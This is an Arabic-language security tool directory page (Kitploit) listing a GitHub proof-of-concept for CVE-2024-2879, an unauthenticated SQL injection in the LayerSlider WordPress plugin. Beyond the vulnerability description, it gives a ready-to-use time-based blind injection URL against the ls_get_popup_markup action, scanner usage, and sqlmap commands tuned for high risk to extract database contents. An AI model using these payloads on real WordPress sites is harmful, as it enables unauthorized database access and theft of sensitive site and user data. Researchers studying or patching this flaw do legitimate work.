Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-2879 — إثبات مفهوم لاستغلال ثغرة CVE-2024-2879: حقن SQL غير مصادق عليه في إضافة LayerSlider لووردبريس (7.9.11-7.10.0). يتضمن سكربت فحص ودليل استغلال عبر SQLMap لاستخراج معلومات قاعدة البيانات. | Kitploit
أدوات/GitHubGitHub/herculeszxc/cve-2024-2879
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubherculeszxc/cve-2024-2879

CVE-2024-2879

إثبات مفهوم لاستغلال ثغرة CVE-2024-2879: حقن SQL غير مصادق عليه في إضافة LayerSlider لووردبريس (7.9.11-7.10.0). يتضمن سكربت فحص ودليل استغلال عبر SQLMap لاستخراج معلومات قاعدة البيانات.

عرض المستودع
2233منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-2879

الوصف

LayerSlider 7.9.11 - 7.10.0 - حقن SQL بدون مصادقة

إضافة LayerSlider لـ WordPress عرضة لحقن SQL عبر إجراء ls_get_popup_markup في الإصدارين 7.9.11 و7.10.0 بسبب عدم كفاية الهروب للمعامل المقدم من المستخدم وعدم كفاية إعداد استعلام SQL الموجود. وهذا يتيح للمهاجمين غير المصادق عليهم إلحاق استعلامات SQL إضافية بالاستعلامات الموجودة بالفعل، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.

استخدام الماسح

  1. ثبّت المتطلبات: pip install -r requirements.txt
  2. python3 scan.py أو <urllist.txt> image

الفحص اليدوي إذا لم يكن الموقع محميًا بـ WAF

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq" تأخير الاستجابة بمقدار 5 ثوانٍ image

استغلال SQL Map

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T أو sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T

تنزيل الأداة